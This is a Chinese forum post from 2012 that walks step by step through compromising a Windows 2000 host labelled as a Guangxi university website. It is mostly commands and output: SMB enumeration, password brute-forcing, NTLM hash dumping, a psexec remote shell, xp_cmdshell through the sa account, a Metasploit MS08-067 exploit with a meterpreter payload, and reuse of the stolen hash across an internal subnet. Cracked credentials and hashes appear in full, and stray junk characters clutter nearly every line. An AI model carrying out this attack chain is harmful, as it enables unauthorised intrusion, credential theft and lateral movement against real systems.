广西师范网站http://202.103.242.241/
: k; s/ z) v) N/ E/ e4 N( ~
$ l2 L1 ^7 `( V( Y5 Croot@bt:~# nmap -sS -sV 202.103.242.241
' n. C* K2 v/ J- g' J4 }1 N$ `, H' k' c" X! T/ ~! |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST" B6 C$ S( X) L7 y7 t, X8 o' X
9 W2 n- r4 i5 s! @* P
Nmap scan report for bogon (202.103.242.241)
9 p, H$ A) O; _9 C F) l4 V* Q8 u, `" d/ Q, u1 M/ z
Host is up (0.00048s latency).
2 L) z6 d# k/ Y7 R V3 R$ P- ^" x; T$ r6 |
Not shown: 993 closed ports8 q9 z1 i y& x) P+ K/ Y' h
j( `; B$ e7 U1 k; k
PORT STATE SERVICE VERSION
3 Q: r8 k0 I! }, V# C
# Y$ Y$ j8 m9 l: C135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
- S$ ]: a2 N% Q. ?8 I" i4 ~% f$ S" @; h
139/tcp open netbios-ssn
" d4 k) C9 t" c2 y
$ J* b% C4 v4 l& x; P& P* N* w445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds6 F5 E# l( H% P0 c% `8 ]: f/ t
, D! S4 a! v; `3 n. n: P1 E1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
# m& x0 { x7 h3 s/ p+ U1 ~9 c* \, m2 ?
1026/tcp open msrpc Microsoft Windows RPC: k; B8 ]3 {- L$ R
4 p( G- _2 s; I; j5 }
3372/tcp open msdtc?$ \0 u$ {5 n1 m, k
5 B6 @% l/ S5 d1 E2 ]3389/tcp open ms-term-serv?& o. C4 c: C% ~9 M6 i+ B2 u, f; P
1 B' N5 h& G/ L T" n! b( Z1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
4 ?# N. l% Q) V! F4 ]/ ESF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
l' W% l8 ]6 d3 [8 f/ X
& Z/ E$ p/ O. @- ?! s: iSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions/ f+ [, Z, k3 j5 p/ X7 V
; ^& Z! Y) M' ?& X. z" _SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
! v k; V2 ?; ~" Q; K; n' [% b
2 ?3 Y7 ]6 x' }' g) u+ kSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
6 G1 k$ h5 S" o' c, r, |1 y% z6 O/ V$ Z! {8 V- W
SF:ptions,6,”hO\n\x000Z”);
q' O. L: O1 N+ d7 q, n& Y% }/ Y3 X: |5 u% V& H
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
2 s, l* L' b: ?' W) Z* P2 G- o) L b; G' i$ y. b m5 `
Service Info: OS: Windows" B k2 o' V: r3 L
9 J, D* [ h' d5 [$ I4 L( X- @Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
+ ?! c* Z5 u+ {- A
6 q1 w; v; D4 B4 TNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
& y4 d+ Q1 p7 g! u
* ]6 o/ o( w( g' M, Lroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本- l: q/ P8 i( v d& ^; P$ q w
; q2 S/ j- @2 q1 ?8 ^
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse: H; f8 {+ ^; g5 W
I* }1 h. H! z! x
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
/ g2 z* p2 o1 Q( f" W, V6 g& P
; ^$ [" m- o; C2 e" E( x: N6 |$ v-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse# o; ^6 {2 P- H2 N$ d' [3 o
$ t% _. L$ t: y2 N' m# v& @0 a
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse% ~9 r& }: Z; J) |# b# e" |2 E
, E, C' \3 R8 y2 H
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse: B$ ^# Y! a9 G
& E/ P1 V0 g+ `9 z7 U
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
. I) ]( Z f" ~' D' D/ ~- a% O" l$ g4 |" h/ W( ]! Z
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
~6 C0 x. E7 Z j. n
8 I' T$ ]* l* G8 D-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
9 `, w- R9 u. P2 j: t0 s2 `* W
& ^! z; f1 I# D4 v# p-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse' f& A' F6 B0 @0 M3 Z
( j- u1 ]0 I5 }' B# h
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse( }* l9 Z. X+ B: ^2 G
4 b' H: f4 G/ W8 P% p; p4 z-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse& A9 n* X" K* c& r) C
- l L3 X5 B. H6 l% p$ B" }-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse" ^! h3 {# |" \. ^2 W- {6 ]5 _
- n, h7 r0 i/ Q2 \% H, M% B: ^
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse! B$ d+ w& l0 [
2 u8 u, M9 h# G" d
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse+ n; i' x! j8 F+ K
9 c- ?5 V% D5 I Y7 \
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse- j1 F; ]/ }+ H- N( @
% Y2 V& t" J4 f, `/ o
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 / i' y$ D# o; F+ }! `! [# F6 l2 {
7 I( t0 z8 e# x/ T$ d2 r/ ~
//此乃使用脚本扫描远程机器所存在的账户名: `9 @' D2 W, I' ?, T" r3 o8 C
7 Y" X$ t$ y1 b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST3 k* D2 x, a5 n% _) s8 L+ z9 y
' F+ `% Z H. Y6 ~( L1 C& |
Nmap scan report for bogon (202.103.242.241)
$ _ P$ W9 Z3 h' n4 w* g# X
4 y3 n; R+ U7 U1 J) VHost is up (0.00038s latency).
& y8 ]( V7 h6 L% ]+ E" C- b9 g; U: K' K; V U; P
Not shown: 993 closed ports
, g9 j, Y0 |0 X) l7 [3 P( f& b8 h8 h
PORT STATE SERVICE
- I" H$ s2 w2 L6 p2 V
2 u6 V3 A/ z0 j4 z& ]% A135/tcp open msrpc" }- a M( S8 H7 c( |, |( k8 c
9 x, C( v, ^8 b: W3 M
139/tcp open netbios-ssn0 Q" D& e4 E# k* {$ P
, ` a. Z+ K3 E; B+ W; z3 D
445/tcp open microsoft-ds
: F% l. I' [) S$ C+ X3 ?) ~$ j$ h. c
1025/tcp open NFS-or-IIS
9 _5 r: ~- }$ e* J; c
, u- u' Y% @! b+ e: S1026/tcp open LSA-or-nterm
G9 W0 S; Z" N* v
+ h, M8 _- M9 B( {, F. F0 i3372/tcp open msdtc
" M8 A/ S5 d6 l c& j
# W2 ]$ Z* ]0 g( s0 |& |# b3389/tcp open ms-term-serv
: j+ i3 c+ F. _9 I
/ d* @1 O. v1 {. UMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 n+ u6 m# a( z' f6 O R( \8 P& H# z
Host script results:% ]/ }& t1 G, Q$ [: f) \
( _; h& c- t2 Q& b+ ?& p) \2 G; d
| smb-enum-users:, Z/ Q o& T0 U0 U; t5 `
; D2 l S2 g" E8 B$ q7 A
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
, U" i* c9 {/ H# c8 F6 e J0 c' u# L
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds# y5 {2 v) i0 e* S* N( ]- U
. k' @2 v3 X* T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 " I5 S! |! k# ]3 R" h
; O( K: F# W: G' v" c" a" V//查看共享( x6 X$ T* {0 B2 @0 I
, a* ]/ ~8 n$ D$ N! b. v9 wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST. o3 c% j* j% x0 z i6 P# i
1 m) ^9 E( M% V/ Z
Nmap scan report for bogon (202.103.242.241)
7 ?$ I& l) @1 a4 I' V1 B0 }6 c1 t/ R$ X4 x* q6 W( n
Host is up (0.00035s latency).
4 D0 O0 B" E3 P& A9 ^3 J V
/ {* \' p- Y" a! yNot shown: 993 closed ports
+ N6 R7 l- R- F# g- D$ m3 B' R) m6 Q+ v% B& f- t" z
PORT STATE SERVICE
2 d; ]( d* D: T/ T# I2 e, B, d
* M* w2 t% p1 V6 E: x% ~# W: [135/tcp open msrpc
" N: z0 Q: u. I7 n/ U
+ r" S" v/ P0 j5 _0 k8 [5 E139/tcp open netbios-ssn* p; n6 M# B% A# I, Z
V3 F0 q. x2 g1 {- x1 O6 j: w445/tcp open microsoft-ds, g I; R! P9 {- _
: x( D$ ?( Z8 u+ x0 m
1025/tcp open NFS-or-IIS+ c0 i% u2 b( P; m0 i
- G3 B) V8 `* g. V2 j. E7 e1026/tcp open LSA-or-nterm& n+ }: O, I! j, c" C* A
o0 {5 m+ w' W* x6 x. S3372/tcp open msdtc% N1 c, m% q* g+ S& j. t5 [4 w
* u0 Q9 | s: ~ l
3389/tcp open ms-term-serv) l6 z1 W; q" S% k
3 R+ ]9 Q6 l7 I3 \1 ] f8 ]
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) G. _; `- A3 k( F
2 O+ q2 B' f& e5 h N! MHost script results:
6 n! s' n# }# e4 g N9 Y. f
6 ?! s& F1 h7 w% S. e! W. \1 S| smb-enum-shares:7 U9 M* c- [" N" N8 e7 P4 ?
+ z, t- J. H2 D: M| ADMIN$
1 \: K/ i' v! i- l
0 v1 R2 v+ Q5 |! u% n+ K| Anonymous access: <none>: A! i9 W! ^( I, {! m% i
, S& G% J. I |5 Z8 @4 A| C$
1 e7 K" m1 K# `( T/ a, S D) l9 i K7 ]1 ]9 o
| Anonymous access: <none>" A7 y1 l9 u: @/ _
. o& X* |7 g3 q) Q- e& q| IPC$( U4 I3 h" C; W
, |* B7 I8 b/ l8 F|_ Anonymous access: READ) _' p! K/ k1 a
2 x- J& N9 W9 I' D6 l" i' b% r( r
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds( @4 ?# _& A2 V# w3 N) Q `
! [1 D+ Q# h. l- [0 h* H
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 % M/ E: |" d7 S, C) M9 c& B( E
0 {1 |7 ~7 m6 z2 U+ p( \
//获取用户密码
, `- B4 Y# M7 F8 o$ w- D. E4 G4 p! y. d4 |5 i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST- X L1 T, b% Q- c* u& V) @
! L( d3 z4 ]4 M
Nmap scan report for bogon (202.103.242.2418)0 _+ A4 D) R6 Q# z4 g
) [% o- e$ \- K& s& SHost is up (0.00041s latency).! [* s3 [. e# V6 S
+ Y k+ v: t3 K1 A
Not shown: 993 closed ports
8 {7 z5 e J; x9 x2 G: m/ i# i! T
PORT STATE SERVICE
8 @' S3 e) s# F1 x/ Y7 s. \7 O: ]: V$ f) ~" |
135/tcp open msrpc
8 j% H* _, N' ]8 I
; p; ?/ F8 L% D139/tcp open netbios-ssn, O6 J7 `( I5 L% d
4 X# G- ?# F% [: e' F, C# d445/tcp open microsoft-ds* E; r/ Q# x' X6 k" H3 g
+ \% t" Q1 i. u" l8 J9 `) r
1025/tcp open NFS-or-IIS1 q" Q5 {0 M+ j2 |6 o9 h- C& s
& H6 W! G C M& ?0 }
1026/tcp open LSA-or-nterm
& Z5 ~+ h* g0 h
& L7 {: ^" e' N+ j8 p3372/tcp open msdtc
. l! _. S6 C; Z! O% L0 h: ?
4 A: E6 }3 m9 M! K4 ^8 T! o3389/tcp open ms-term-serv& A+ l3 ~' Z Z* q- n, w
; [ q& `' e, O1 q" ]1 k" d% BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 i. D" Z! V: c; W( Y9 L
) G$ P r( @: F; ~1 ^/ xHost script results:% j9 L6 N) k; s$ ]+ j
$ W8 Q, w' v+ M: Z7 ]1 ^0 b| smb-brute:
8 G9 ]6 A4 U5 L7 ?5 d. q5 W
9 f* m7 B* u8 E: P% Oadministrator:<blank> => Login was successful
" b, |6 w/ T8 J9 q! p6 p
: F- C: u0 n/ {8 N# L|_ test:123456 => Login was successful0 J; u" r0 X' s: P& g0 C
1 l. ]# |8 O" E- Q# ] NNmap done: 1 IP address (1 host up) scanned in 28.22 seconds* T- i2 f. w( R) t- V6 P1 L4 Y
( ]# W1 t7 h# {/ p: k3 Y' E
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash9 W4 A9 r! W6 L) M5 x$ @4 v9 r
- c! z- O. D- O* {" I$ [
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
7 O9 r9 Z0 m) r( M6 y: `, E& |' E. ?. P2 |, W9 P$ _6 _% W
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse5 V; G( g5 q4 @2 I) D
- G( H: U8 w) s" X5 xroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1391 \7 r' g. A6 \$ J
/ J1 ~ u1 b0 M2 J) f( v
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST$ Q( w- W4 |: r: x" L5 o
* X' y" K i) o! P+ s
Nmap scan report for bogon (202.103.242.241)$ N' Q" h/ i- ~3 v o& W1 ?. J
. @! w( M, L/ ` Z9 x P
Host is up (0.0012s latency).
, V, }; S- c5 m1 o. x1 i8 M3 V, E
, j& X' F1 e& m9 y4 G: SPORT STATE SERVICE
3 g) q( J9 i% J0 p3 t! `
, f* P8 ?" A4 {/ s2 I) _3 s2 p135/tcp open msrpc+ G1 k, E1 A9 }7 U
% v* D( y; y9 _" ?. j0 C139/tcp open netbios-ssn
- f8 C: A0 x: ?* ^+ w# s8 T
- U J/ Z) F) U, U445/tcp open microsoft-ds
5 o' l* f$ w% S7 p
& o! O4 S4 M% N, [; X" A# N0 `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# n% ?* Q2 H E7 Q$ D, P
/ O0 F1 M1 A k; z/ Y1 JHost script results:' W( g- P4 |# d7 Q; E4 }( I0 X
! ^/ U3 G$ o# X! j9 U2 r| smb-pwdump:( _/ s5 r+ f! g6 d5 }# J3 T
" V G: e8 u) Z: u
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
* m2 Y/ c" l1 `
$ H. _+ w! ?9 x7 i/ D" b) h4 M| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
- V+ i) U9 H7 t' I
3 r' \- {3 g3 N' W| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4+ a5 n4 n# c% y
2 \% f: ` E6 @/ V+ k9 N
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
6 ]" y$ B6 u9 l: J" F/ f j9 h5 M. q* j: i2 W/ A
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
- S2 h5 P5 X( G( O, M( t% ^/ c ]) d/ O% \0 k
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
1 K' s" |$ e1 y% J/ ?. l* h: T4 c8 x8 B
-p 123456 -e cmd.exe
& D1 {1 n9 D0 o K$ i+ n/ W3 p8 Y' s% A# B; K) T8 G4 i
PsExec v1.55 – Execute processes remotely, W$ X1 s: c5 k) j7 x/ B
" J( A z3 o7 |5 uCopyright (C) 2001-2004 Mark Russinovich
( _# Z% ]( e8 G9 e# d. a
( g8 @7 Y9 q, X& a7 DSysinternals – www.sysinternals.com2 e# H2 Y1 [4 B2 {: z
$ c7 g) ~ R t% f+ t8 UMicrosoft Windows 2000 [Version 5.00.2195]
! W& C) \9 D0 V: K: @. Z# F9 {: w, d2 C# V
(C) 版权所有 1985-2000 Microsoft Corp.
- ^- v( b. i9 D( ]$ i+ \
8 S9 o( s# Z: f# cC:\WINNT\system32>ipconfig; _! W3 O0 Q5 {" q' I! a
9 s7 J' E; x1 H( d, xWindows 2000 IP Configuration& \; o9 N+ `9 p- t/ Y$ x! g k1 T
+ `5 i1 }) Q% c) \
Ethernet adapter 本地连接:
3 z0 U1 c, x+ ^/ s: @) q+ H- x' D6 i, Q I' Y* k* c/ \
Connection-specific DNS Suffix . :
8 Y- |5 P0 l9 V: U/ G3 e# p' ~1 ~0 n8 }3 I$ |- _/ H
IP Address. . . . . . . . . . . . : 202.103.242.241
4 e, G+ m. f) b! b0 u) Y* ]% V' B7 E3 k- X" @
Subnet Mask . . . . . . . . . . . : 255.255.255.0% Q6 j0 X: r4 F- T
3 q% \) @ P7 }& F- mDefault Gateway . . . . . . . . . : 202.103.1.1; [' K; P: b; ^! z7 k3 P
# h j' j- g4 G e( ^) z' m
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
* n% T4 B/ f+ a, h1 w% i' v" R) `, e6 u' J g
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞4 w- u. I% ~9 }, W
/ z; V9 x2 q* w5 P9 dStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST* }( [! r: H+ i" S7 i1 O. _
u/ O! a+ Q& [/ w! U+ `" v
Nmap scan report for bogon (202.103.242.241)
: ~6 t x4 Z0 I) ~! N! @ [
: ` Q! u& o' L$ VHost is up (0.00046s latency).
2 B4 Y. u1 m2 q; U2 b! x
6 w9 W9 r' ?0 T8 uNot shown: 993 closed ports
1 |* s+ j4 C$ j
5 w, |# ~$ `* l5 d7 }) VPORT STATE SERVICE
; l8 ^ L f0 `/ y) C3 o
& B( _& Z" [, U5 F1 d2 r. q135/tcp open msrpc
+ D2 R8 R. h& B$ D
, {0 E% { S: U# w6 J5 y139/tcp open netbios-ssn \/ m. o& \2 t7 R, d
% V0 {7 P+ G% u) `$ K. j0 G8 b- o445/tcp open microsoft-ds
( b9 t! K3 _1 |! J" w0 X; l X
1025/tcp open NFS-or-IIS
o- R. |. B6 [7 }9 c. J' r' @
& i7 N& ^- N/ F" J+ q b1 I$ Z1026/tcp open LSA-or-nterm
0 ^9 ]# Q0 O7 N/ k! `, g5 T
& Q: Z/ u# D, Y _3372/tcp open msdtc0 h& F3 I% i) @) |" @. U8 _
) O( l6 ^7 M. u
3389/tcp open ms-term-serv
- l, Z2 T! n; c6 [4 A2 a' U
! s8 h- ]8 U- h {+ BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 w% f3 ?& ]3 R, I' z* V- J/ h# D* l8 N- B& C7 N
Host script results:
* _. Y% Z2 [; n& P. u5 G/ Q4 \2 t. k" D0 |( T, T9 |
| smb-check-vulns:- c2 e" m" Z3 i8 p' y0 ~' _3 ?% f n
" t; _/ y6 _1 E# r- Q
|_ MS08-067: VULNERABLE
3 b& ~5 U. J' Y i. z8 i- |8 O8 B9 Q: `
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
6 S7 v" b# \* L2 S8 f
" M4 G5 D& Q& troot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
. l# X5 L. {# m6 h5 y: e
% a, C. Z2 s7 c- Gmsf > search ms08. E+ H: @ E( r1 e" E0 a. w3 u" O
# x; T3 P; Q% { `# U2 {- Vmsf > use exploit/windows/smb/ms08_067_netapi
+ x; Y# `- b: w" Z! ?& H m3 @) Q( s- u1 A- C
msf exploit(ms08_067_netapi) > show options7 q& O) Q8 F: N9 G) W: U" r
% E5 `* G$ \$ u( [
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241% Q# ^* l! I3 Z5 T
( b5 v7 P" G9 c) l# j: d/ K7 cmsf exploit(ms08_067_netapi) > show payloads+ P; H! X5 G% k2 G4 a
0 ?& U5 z( K- R2 ~# ^/ }( Z5 Ymsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp6 L6 G# t6 B( @8 i2 H+ ]
$ R; S4 M& F4 I) ] n5 q1 M' e5 zmsf exploit(ms08_067_netapi) > exploit
& P; L9 _+ n5 y6 s; V+ E6 S, R/ q3 M8 O4 u
meterpreter >0 |1 ?1 h3 M) X6 {* i C' ?5 [
% [2 [, `7 _! dBackground session 2? [y/N] (ctrl+z)
( T! V* ^3 `; {" `. |- U/ v
- q+ z1 U& }/ Z3 E6 D5 `. Gmsf exploit(ms08_067_netapi) > sessions -l' K6 ] b6 P( z6 B$ W7 p" P
- m! s' ]: d6 r! X
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt6 R X3 r/ N7 l/ h1 @0 \
. ]' ~. W6 L/ ]1 n7 q+ L! M
test
3 p1 [: ?1 U6 @. n3 r5 y' V, T b1 o( A" w( L
administrator# O) G+ C7 f/ T, C
3 N l; r/ I& ^' F% o0 h2 {root@bt:/usr/local/share/nmap/scripts# vim password.txt5 x" d2 q0 y2 z! Q2 U4 f( q
5 W/ j: f' P6 @% J* N8 |" H+ K- R
44EFCE164AB921CAAAD3B435B51404EE2 z9 V; G, {* \! v
' ]9 z2 H" V# T' @; troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
. {! E; s# P! r% l/ s4 s2 s3 y8 ?* d
//利用用户名跟获取的hash尝试对整段内网进行登录
- P0 s) y; j8 {& C2 f ^" f% f1 w
Nmap scan report for 192.168.1.105
& I0 Z8 z" h$ C a
1 o2 R* y+ W0 e- b5 b. X( UHost is up (0.00088s latency).
) c' e9 ^3 H0 D9 J, w; a1 G6 m+ R) ]9 I# w! h% }& ~3 N
Not shown: 993 closed ports& ^3 n0 R+ c% r* H$ n
|; T, a5 `3 ~0 i7 p( U# `/ i. \PORT STATE SERVICE/ Q- W& b# b& y/ J0 N
~. `9 d3 o+ |% }) B135/tcp open msrpc
0 s5 V3 l+ D% g3 ]( ~4 }
6 R J7 V" b( U( k' c; f+ d3 J6 L139/tcp open netbios-ssn
) x6 d7 L5 G6 C+ ]; H. i, j7 L2 c
/ f' Y5 _8 i' W$ i: N! J445/tcp open microsoft-ds* @6 d; l& t/ U3 r% O2 c
) M+ k+ I# [- t2 E1025/tcp open NFS-or-IIS0 ~+ _+ v: @9 x, s9 i! \8 J8 u" I
+ ^0 c. Y; t9 f5 g8 u1026/tcp open LSA-or-nterm
* d9 K8 z F D; X4 }
6 _, f4 k" y5 ^" W1 V1 T+ {5 o, U! D% \% A2 R3372/tcp open msdtc
7 v4 n* K; N0 w) Q
2 T( \/ c9 |5 s7 ^" B8 t" I3389/tcp open ms-term-serv
2 W, q1 }+ H8 a8 k
4 ^# P# L7 M" kMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 f4 W* O/ k; L) k
' x$ V- Z/ G* X$ X) |# m) p
Host script results:/ y% j4 {5 C0 b
% Z" Q* p+ N2 D& W1 b
| smb-brute:
/ l1 x2 t% p9 O' G' ?9 D: u" [. G5 L, Z6 x4 K
|_ administrator:<blank> => Login was successful) E" H/ C& G! S7 ]* b* p
# q5 ~. M/ k# G6 t# A0 r
攻击成功,一个简单的msf+nmap攻击~~·
3 Q9 m+ l) J! L3 B/ G8 c* M* k( j( |: p) {
|
发表于 2012-12-4 12:46:42
收藏
支持
反对